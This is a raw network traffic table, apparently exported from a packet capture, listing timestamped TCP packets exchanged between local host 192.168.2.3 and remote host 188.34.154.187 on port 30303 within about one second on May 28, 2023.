May 28, 2023 10:46:23.287256002 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287264109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287280083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287285089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287298918 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287327051 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287342072 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287360907 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287379980 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287385941 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287400007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287406921 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287420988 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287441015 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287441969 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287472963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287483931 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287493944 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287513018 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287514925 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287532091 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287538052 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287553072 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287571907 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287580967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287580967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287590981 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287599087 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287611008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287616968 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287631035 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287641048 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287651062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287661076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287671089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287692070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287708998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287712097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287729025 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287731886 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287748098 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287750959 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287777901 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287779093 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287801981 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287808895 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287823915 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287837982 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287847042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287852049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287868023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287875891 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287889957 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287895918 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287909985 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287918091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287931919 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287935972 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287951946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287960052 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287980080 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.288001060 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.288005114 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.288024902 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.288044930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.288054943 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.288065910 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.288077116 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.288086891 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.288089037 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.288108110 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.288116932 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.288130999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.288137913 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.288165092 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.288183928 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.300767899 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.300823927 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.301858902 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.301918983 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.301999092 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302020073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302041054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302051067 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302062035 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302071095 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302083969 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302089930 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302105904 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302109003 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302128077 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302128077 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302149057 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302149057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302167892 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302196026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302205086 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302217960 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302237988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302238941 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302258968 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302264929 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302279949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302279949 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302301884 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302301884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302323103 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302326918 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302344084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302364111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302365065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302364111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302386999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302391052 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302407980 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302408934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302428961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302431107 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302449942 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302452087 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302472115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302474022 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302493095 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302493095 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302514076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302515984 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302536964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302546024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302556992 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302586079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302601099 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302853107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302891016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302898884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302910089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302928925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302934885 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302948952 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302949905 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302968979 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302973032 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.302989006 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.302992105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303008080 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303023100 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303028107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303034067 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303047895 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303067923 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303073883 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303086996 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303098917 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303107977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303127050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303127050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303148985 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303153038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303169012 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303179979 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303188086 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303199053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303206921 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303219080 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303229094 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.303239107 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303260088 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.303275108 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.305026054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.305046082 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.305067062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.305088997 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.305094957 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.305114031 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.305147886 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306149006 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306169987 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306206942 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306215048 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306221008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306237936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306284904 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306284904 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306318998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306339025 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306364059 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306380033 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306385040 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306407928 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306427956 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306437016 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306449890 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306456089 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306473017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306492090 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306495905 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306538105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306544065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306566954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306586027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306593895 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306615114 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306632042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306633949 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306654930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306674004 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306698084 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.306734085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.306776047 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307239056 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307260990 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307285070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307295084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307301998 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307328939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307336092 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307349920 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307372093 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307374001 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307394981 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307395935 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307413101 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307418108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307437897 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307460070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307465076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307486057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307504892 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307523012 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307545900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307554007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307595968 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307600021 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307621956 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307641983 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307642937 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307663918 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307667017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307683945 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307706118 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307723045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307765961 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307805061 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307826042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307847023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307849884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307867050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307868958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307888985 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307892084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307913065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307915926 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307934999 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307939053 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307965040 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.307984114 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.307984114 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308037043 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308058023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308063984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308079004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308085918 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308099985 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308104038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308124065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308142900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308836937 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308857918 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308887005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308892012 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308903933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308912039 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308933020 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308939934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308954954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308959007 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308976889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.308978081 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308996916 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.308999062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309019089 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309022903 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309045076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309045076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309065104 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309068918 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309092045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309092045 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309112072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309113979 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309132099 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309138060 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309159040 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309160948 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309179068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309180975 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309204102 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309212923 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309226036 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309226990 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309248924 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309250116 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309271097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309271097 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309292078 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309294939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309317112 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309317112 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309336901 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309340000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309360981 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309361935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309382915 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309382915 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.309401989 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.309427023 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310472012 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310493946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310519934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310529947 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310534954 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310551882 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310571909 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310573101 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310592890 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310595036 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310614109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310619116 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310637951 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310642958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310662031 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310667038 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310687065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310709953 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310749054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310770988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310791016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310800076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310811996 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310820103 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310834885 CEST	30303	49685	188.34.154.187	192.168.2.3
